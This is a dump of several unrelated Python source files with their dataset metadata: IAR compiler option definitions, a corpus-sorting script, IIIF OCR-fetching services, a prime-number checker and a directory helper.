prototypes\n            'state': 0,\n        },\n        'CCMultibyteSupport': {\n            'state': 0,\n        },\n        'CCCompilerRuntimeInfo': {\n            'state': 0,\n        },\n        'CCDiagWarnAreErr': {\n            'state': 0,\n        },\n        'IFpuProcessor': {\n            'state': 0,\n        },\n        'OutputFile': {\n            'state': '',\n        },\n        'CCLibConfigHeader': {\n            'state': 0,\n        },\n        'PreInclude': {\n            'state': 0,\n        },\n        'CompilerMisraOverride': {\n            'state': 0,\n        },\n        'CCStdIncCheck': {\n            'state': 0,\n        },\n        'CCCodeSection': {\n            'state': '.text',\n        },\n        'IInterwork2': {\n            'state': 0,\n        },\n        'IProcessorMode2': {\n            'state': 0,\n        },\n        'CCOptLevel': {  # [C/C++ Compiler] Optimization level\n            'state': 0,  # 0 - None, 1 - Low, 2 - Medium , 3 - High\n        },\n        'CCOptStrategy': {  # [C/C++ Compiler] Valid only for Optimization level High\n            'version': 0,\n            'state': 0,  # 0 - Balanced, 1 - Size, 2 - Speed\n        },\n        'CCOptLevelSlave': {\n            'state': 0,\n        },\n        'CompilerMisraRules98': {\n            'version': 0,\n            'state': 0,\n        },\n        'CompilerMisraRules04': {\n            'version': 0,\n            'state': 0,\n        },\n        'CCPosIndRopi': {  # [C/C++ Compiler][Code] Code and read-only data\n            'state': 0,\n        },\n        'IccLang': {  # [C/C++ Compiler] C/C++ Language selection\n            'state': 0,  # 0 - C, 1 - C++, 2 - Auto\n        },\n        'CCPosIndNoDynInit': {  # [C/C++ Compiler][Code]\n            'state': 0,\n        },\n        'CCPosIndRwpi': {  # [C/C++ Compiler][Code] Read write/data\n            'state': 0,\n        },\n        'IccCDialect': {  # [C/C++ Compiler] C dialect\n            'state': 1,  # 0 - C89, 1 - C99\n        },\n        'IccAllowVLA': {  # [C/C++ Compiler] Allow VLA (valid only for C99)\n            'state': 0,\n        },\n        'IccCppDialect': {  # [C/C++ Compiler] C++ dialect\n            'state': 0,  # 0 - Embedded C++, 1 - Extended embedded, 2 - C++\n        },\n        'IccExceptions': {  # [C/C++ Compiler] With exceptions (valid only for C++ dialect 2)\n            'state': 0,\n        },\n        'IccRTTI': {  # [C/C++ Compiler] With RTTI (valid only for C++ dialect 2)\n            'state': 0,\n        },\n        'IccStaticDestr': {\n            'state': 1,\n        },\n        'IccCppInlineSemantics': {  # [C/C++ Compiler] C++ inline semantic (valid only for C99)\n            'state': 0,\n        },\n        'IccCmsis': {\n            'state': 1,\n        },\n        
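# NOTE: these 'state' values mirror option values found in an IAR .ewp project file (see the mcu_def comment above)\n        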
'IccFloatSemantics': { # [C/C++ Compiler] Floating point semantic\n 'state': 0, # 0 - strict, 1 - relaxed\n },\n\n 'AObjPrefix': { # Generate object files for assembly files\n 'state': 1,\n },\n 'AEndian': {\n 'state': 0,\n },\n 'ACaseSensitivity': {\n 'state': 0,\n },\n 'MacroChars': {\n 'state': 0,\n },\n 'AWarnEnable': {\n 'state': 0,\n },\n 'AWarnWhat': {\n 'state': 0,\n },\n 'AWarnOne': {\n 'state': 0,\n },\n 'AWarnRange1': {\n 'state': 0,\n },\n 'AWarnRange2': {\n 'state': 0,\n },\n 'ADebug': { # [Assembler] Generate debug info\n 'state': 0,\n },\n 'AltRegisterNames': {\n 'state': 0,\n },\n 'ADefines': { # [Assembler] Preprocessor - Defines\n 'state': '',\n },\n 'AList': {\n 'state': 0,\n },\n 'AListHeader': {\n 'state': 0,\n },\n 'AListing': {\n 'state': 0,\n },\n 'Includes': {\n 'state': '',\n },\n 'MacDefs': {\n 'state': 0,\n },\n 'MacExps': {\n 'state': 0,\n },\n 'MacExec': {\n 'state': 0,\n },\n 'OnlyAssed': {\n 'state': 0,\n },\n 'MultiLine': {\n 'state': 0,\n },\n 'PageLengthCheck': {\n 'state': 0,\n },\n 'PageLength': {\n 'state': 0,\n },\n 'TabSpacing': {\n 'state': 0,\n },\n 'AXRefDefines': {\n 'state': 0,\n },\n 'AXRef': {\n 'state': 0,\n },\n 'AXRefInternal': {\n 'state': 0,\n },\n 'AXRefDual': {\n 'state': 0,\n },\n 'AProcessor': {\n 'state': 0,\n },\n 'AFpuProcessor': {\n 'state': 0,\n },\n 'AOutputFile': {\n 'state': 0,\n },\n 'AMultibyteSupport': {\n 'state': 0,\n },\n 'ALimitErrorsCheck': {\n 'state': 0,\n },\n 'ALimitErrorsEdit': {\n 'state': 100,\n },\n 'AIgnoreStdInclude': {\n 'state': 0,\n },\n 'AUserIncludes': {\n 'state': '',\n },\n 'AExtraOptionsCheckV2': {\n 'state': 0,\n },\n 'AExtraOptionsV2': {\n 'state': 0,\n },\n 'OOCOutputFormat': {\n 'state': 0,\n },\n 'OCOutputOverride': {\n 'state': 0,\n },\n 'OOCCommandLineProducer': {\n 'state': 0,\n },\n 'OOCObjCopyEnable': {\n 'state': 1,\n },\n\n 'IlinkOutputFile': {\n 'state': 0,\n },\n 'IlinkLibIOConfig': {\n 'state': 0,\n },\n 'XLinkMisraHandler': {\n 'state': 0,\n },\n 'IlinkInputFileSlave': {\n 'state': 0,\n },\n 'IlinkDebugInfoEnable': {\n 'state': 0,\n },\n 'IlinkKeepSymbols': {\n 'state': 0,\n },\n 'IlinkRawBinaryFile': {\n 'state': 0,\n },\n 'IlinkRawBinarySymbol': {\n 'state': 0,\n },\n 'IlinkRawBinarySegment': {\n 'state': 0,\n },\n 'IlinkRawBinaryAlign': {\n 'state': 0,\n },\n 'IlinkDefines': {\n 'state': 0,\n },\n 'IlinkConfigDefines': {\n 'state': 0,\n },\n 'IlinkMapFile': {\n 'state': 0,\n },\n 'IlinkLogFile': {\n 'state': 0,\n },\n\n 'IlinkLogInitialization': {\n 'state': 0,\n },\n 'IlinkLogModule': {\n 'state': 0,\n },\n 'IlinkLogSection': {\n 'state': 0,\n },\n 'IlinkLogVeneer': {\n 'state': 0,\n },\n 'IlinkIcfOverride': {\n 'state': 0,\n },\n 'IlinkEnableRemarks': {\n 'state': 0,\n },\n 'IlinkSuppressDiags': {\n 'state': 0,\n },\n\n 'IlinkTreatAsRem': {\n 'state': 0,\n },\n 'IlinkTreatAsWarn': {\n 'state': 0,\n },\n 'IlinkTreatAsErr': {\n 'state': 0,\n },\n 'IlinkWarningsAreErrors': {\n 'state': 0,\n },\n 'IlinkUseExtraOptions': {\n 'state': 0,\n },\n 'IlinkExtraOptions': {\n 'state': 0,\n },\n 'IlinkLowLevelInterfaceSlave': {\n 'state': 0,\n },\n 'IlinkAutoLibEnable': {\n 'state': 0,\n },\n 'IlinkProgramEntryLabelSelect': {\n 'state': 0,\n },\n 'IlinkProgramEntryLabel': {\n 'state': 0,\n },\n }\n","sub_path":"project_generator/exporters/iar_definitions.py","file_name":"iar_definitions.py","file_ext":"py","file_size_in_byte":13799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"585403537","text":"__author__ = \"Gilevich Vyacheslav 
(gilevich@me.com)\"\n\nimport sys\nimport nltk\n\nif len(sys.argv) != 3:\n\tprint(\"\"\"\nSorts corpora from easies to hardest sentences (based on sentences' words' frequency)\n\nUsage:\n{0} /path/to/translated.txt /path/to/original.txt\"\"\".format(sys.argv[0]))\nelse:\n\ttexts = []\n\twords = [dict(),dict()]\n\twith open(sys.argv[1], 'r') as translated, open(sys.argv[2], 'r') as original:\n\t\tfor translated_row in translated:\n\t\t\toriginal_row = original.readline()\n\t\t\ttexts.append([translated_row, original_row])\n\n\t\t\tfor word in translated_row.split():\n\t\t\t\tif word in words[0]:\n\t\t\t\t\twords[0][word] += 1\n\t\t\t\telse:\n\t\t\t\t\twords[0][word] = 1\n\n\t\t\tfor word in original_row.split():\n\t\t\t\tif word in words[1]:\n\t\t\t\t\twords[1][word] += 1\n\t\t\t\telse:\n\t\t\t\t\twords[1][word] = 1\n\n\ttexts = sorted(texts, key=lambda lines: sum([sum([1/words[i][word] for word in lines[i].split()]) for i in range(2)]) )\n\n\twith open(sys.argv[1], 'w+') as translated, open(sys.argv[2], 'w+') as original:\n\t\tfor lines in texts:\n\t\t\ttranslated.write(lines[0])\n\t\t\toriginal.write(lines[1])\n\n\n","sub_path":"sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"604622539","text":"import requests\nimport json\nimport csv\nfrom django.conf import settings\nfrom apps.utils.fetch import fetch_url\nimport config.settings.local as local_settings\nimport xml.etree.ElementTree as ET\n\ndef get_canvas_info(canvas):\n \"\"\" Given a url, this function returns a dictionary of all collections.\"\"\"\n return fetch_url(canvas.service_id, timeout=settings.HTTP_REQUEST_TIMEOUT, format='json')\n\n# TODO figure out a way to test the fetch\ndef fetch_positional_ocr(canvas):\n if 'archivelab' in canvas.IIIF_IMAGE_SERVER_BASE.IIIF_IMAGE_SERVER_BASE:\n return fetch_url(\"https://api.archivelab.org/books/{m}/pages/{p}/ocr?mode=words\".format(m=canvas.manifest.pid, p=canvas.pid.split('$')[-1]))\n elif 'images.readux.ecds.emory' in canvas.IIIF_IMAGE_SERVER_BASE.IIIF_IMAGE_SERVER_BASE:\n return fetch_url(\"https://raw.githubusercontent.com/ecds/ocr-bucket/master/{m}/{p}.tsv\".format(m=canvas.manifest.pid, p=canvas.pid.split('_')[-1].replace('.jp2', '').replace('.jpg', '').replace('.tif', '')), format='text')\n else:\n return fetch_url(\"{p}{c}{s}\".format(p=settings.DATASTREAM_PREFIX, c=canvas.pid.replace('fedora:',''), s=settings.DATASTREAM_SUFFIX), format='text/plain')\n\ndef add_positional_ocr(canvas, result):\n ocr = []\n if 'archivelab' in canvas.IIIF_IMAGE_SERVER_BASE.IIIF_IMAGE_SERVER_BASE:\n if 'ocr' in result and result['ocr'] is not None:\n for index, word in enumerate(result['ocr']):\n if len(word) > 0:\n for w in word:\n ocr.append({\n 'content': w[0],\n 'w': (w[1][2] - w[1][0]),\n 'h': (w[1][1] - w[1][3]),\n 'x': w[1][0],\n 'y': w[1][3]\n })\n elif 'images.readux.ecds.emory' in canvas.IIIF_IMAGE_SERVER_BASE.IIIF_IMAGE_SERVER_BASE:\n # include the quote marks in content\n class include_quotes_dialect(csv.Dialect):\n lineterminator = '\\n'\n delimiter= '\\t'\n quoting = csv.QUOTE_NONE # perform no special processing of quote characters\n reader = csv.DictReader(result.split('\\n'), dialect=include_quotes_dialect)\n for row in reader:\n content = row['content']\n w = int(row['w'])\n h = int(row['h'])\n x = int(row['x'])\n y = int(row['y'])\n ocr.append({\n 'content': content,\n 'w': w,\n 'h': h,\n 'x': x,\n 'y': y,\n })\n else:\n if result is not None:\n # What 
comes back from fedora is 8-bit bytes\n            for index, word in enumerate(result.decode('UTF-8-sig').strip().split('\\r\\n')):\n                if (len(word.split('\\t')) == 5):\n                    ocr.append({\n                        'content': word.split('\\t')[4],\n                        'w': int(word.split('\\t')[2]),\n                        'h': int(word.split('\\t')[3]),\n                        'x': int(word.split('\\t')[0]),\n                        'y': int(word.split('\\t')[1])\n                    })\n    if (ocr):\n        return ocr\n    else:\n        return None\n\ndef fetch_alto_ocr(canvas):\n    if 'archivelab' in canvas.IIIF_IMAGE_SERVER_BASE.IIIF_IMAGE_SERVER_BASE:\n        return None\n    else:\n        url = \"{p}{c}/datastreams/tei/content\".format(p=settings.DATASTREAM_PREFIX, c=canvas.pid.replace('fedora:',''))\n        return fetch_url(url, format='text/plain')\n\ndef add_alto_ocr(canvas, result):\n    if result is None:\n        return None\n    ocr = []\n    surface = ET.fromstring(result)[-1][0]\n    for zones in surface:\n        if 'zone' in zones.tag:\n            for line in zones:\n                if line[-1].text is None:\n                    continue\n                ocr.append({\n                    'content': line[-1].text,\n                    'h': int(line.attrib['lry']) - int(line.attrib['uly']),\n                    'w': int(line.attrib['lrx']) - int(line.attrib['ulx']),\n                    'x': int(line.attrib['ulx']),\n                    'y': int(line.attrib['uly'])\n                })\n    if (ocr):\n        return ocr\n    else:\n        return None\n","sub_path":"apps/iiif/canvases/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"261345777","text":"\"\"\"\nPrime numbers\n\"\"\"\n#prints TAK (yes) if the number is prime, NIE (no) otherwise\nn = int(input('Number of tests: '))\nwhile n > 0:\n    liczba = int(input(f'Number {n}:'))\n    if liczba == 1:\n        #1 is not prime\n        print('NIE')\n        n -= 1\n        continue\n    elif liczba == 2:\n        #2 is prime\n        print('TAK')\n        n -= 1\n        continue\n    for elem in range(2, liczba):\n        if liczba % elem == 0:\n            print('NIE')\n            break\n    else:\n        print('TAK')\n\n    n -= 1\n","sub_path":"028 Liczby pierwsze/LiczbyPierwsze.py","file_name":"LiczbyPierwsze.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"295747833","text":"#!/usr/bin/env python\n# coding=utf-8\n# Stan 2012-03-10\n\nfrom __future__ import (division, absolute_import,\n                        print_function, unicode_literals)\n\nimport os\n\nfrom ...core.types23 import *  # str\n\n\ndef prepare_dir(filename, options, recorder):\n    try:\n        filename = str(filename)\n\n    except UnicodeDecodeError:\n        recorder.warning(\"Filename encoding is wrong!\", target=repr(filename), once=\"dir_1\")\n        return\n\n    recorder.dir = filename\n    return dict(\n        provider = recorder.provider,\n        name = filename,\n    )\n","sub_path":"index_cli/base/proceed/filesystem_dir.py","file_name":"filesystem_dir.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}